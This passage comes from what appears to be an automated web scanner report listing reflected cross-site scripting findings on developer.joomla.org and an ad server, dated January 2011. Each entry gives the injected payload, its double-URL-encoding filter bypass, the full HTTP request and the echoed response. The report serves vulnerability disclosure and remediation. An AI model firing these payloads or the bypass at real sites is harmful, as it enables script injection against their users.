Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/c2f1d"><img src=a onerror=alert(1)>956a7445bcc" />
...[SNIP]...

4.65. http://developer.joomla.org/improving-joomla.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /improving-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e835%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e03e4a9b113f was submitted in the REST URL parameter 1. This input was echoed as 6e835"><img src=a onerror=alert(1)>03e4a9b113f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /6e835%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e03e4a9b113f HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.18.10.1295890937;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/6e835"><img src=a onerror=alert(1)>03e4a9b113f" />
...[SNIP]...

4.66. http://developer.joomla.org/security.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /security.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9be7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec8433896990 was submitted in the REST URL parameter 1. This input was echoed as a9be7"><img src=a onerror=alert(1)>c8433896990 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a9be7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec8433896990 HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=24d4dc7aa5497203c5eea18807f36bae; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/a9be7"><img src=a onerror=alert(1)>c8433896990" />
...[SNIP]...

4.67. http://developer.joomla.org/security/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /security/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fee9a%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e313d6b92d96 was submitted in the REST URL parameter 2. This input was echoed as fee9a"><img src=a onerror=alert(1)>313d6b92d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /security/afee9a%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e313d6b92d96 HTTP/1.1
Host: developer.joomla.org
Proxy-Connection: keep-alive
Referer: http://developer.joomla.org/security/53028%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee019f420596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.9.10.1295890937; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.10.10.1295890937; 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:59:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
X-Content-Encoded-By: Joomla! 1.6
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 8151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/security/afee9a"><img src=a onerror=alert(1)>313d6b92d96" />
...[SNIP]...

4.68. http://developer.joomla.org/security/news.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /security/news.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53028%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee019f420596 was submitted in the REST URL parameter 2. This input was echoed as 53028"><img src=a onerror=alert(1)>e019f420596 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /security/53028%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee019f420596 HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/security/53028"><img src=a onerror=alert(1)>e019f420596" />
...[SNIP]...

4.69. http://developer.joomla.org/security/news.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /security/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dce01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e865402a94b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dce01\\\"><script>alert(1)</script>865402a94b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /security/news.html?dce01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e865402a94b=1 HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=eadd17f1c6c6ff18997751a779b9f23d; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<link href="/security/news.feed?dce01\\\"><script>alert(1)</script>865402a94b=1&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.70. http://developer.joomla.org/strategy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /strategy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ca8%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e15c9b3e2c1f was submitted in the REST URL parameter 1. This input was echoed as 26ca8"><img src=a onerror=alert(1)>15c9b3e2c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /26ca8%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e15c9b3e2c1f HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.18.10.1295890937;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:15 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/26ca8"><img src=a onerror=alert(1)>15c9b3e2c1f" />
...[SNIP]...

4.71. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619ee"><script>alert(1)</script>2b06e2712f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM619ee"><script>alert(1)</script>2b06e2712f8/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:31:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM619ee"><script>alert(1)</script>2b06e2712f8/2010DM/593445285/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.72. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60cc"><script>alert(1)</script>4f017f29e35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMd60cc"><script>alert(1)</script>4f017f29e35/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMd60cc"><script>alert(1)</script>4f017f29e35/1511925775/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.73. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f6bd"><script>alert(1)</script>eb615743a72 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1596198292@x231f6bd"><script>alert(1)</script>eb615743a72?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/861969584/x231f6bd"><script>alert(1)</script>eb615743a72/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.74. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11596989115@x92

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a398"><script>alert(1)</script>d8345505b59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM7a398"><script>alert(1)</script>d8345505b59/DLX/11596989115@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM7a398"><script>alert(1)</script>d8345505b59/DLX/874784747/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.75. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11596989115@x92

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71cf"><script>alert(1)</script>38508b24698 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXa71cf"><script>alert(1)</script>38508b24698/11596989115@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXa71cf"><script>alert(1)</script>38508b24698/937889478/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.76. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11596989115@x92

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fb7"><script>alert(1)</script>41ff5d04ea0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/11596989115@x92b6fb7"><script>alert(1)</script>41ff5d04ea0? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/600055347/x92b6fb7"><script>alert(1)</script>41ff5d04ea0/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.77. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44cca"><script>alert(1)</script>4362d4b98ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM44cca"><script>alert(1)</script>4362d4b98ab/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM44cca"><script>alert(1)</script>4362d4b98ab/DLX/2078582943/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.78. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
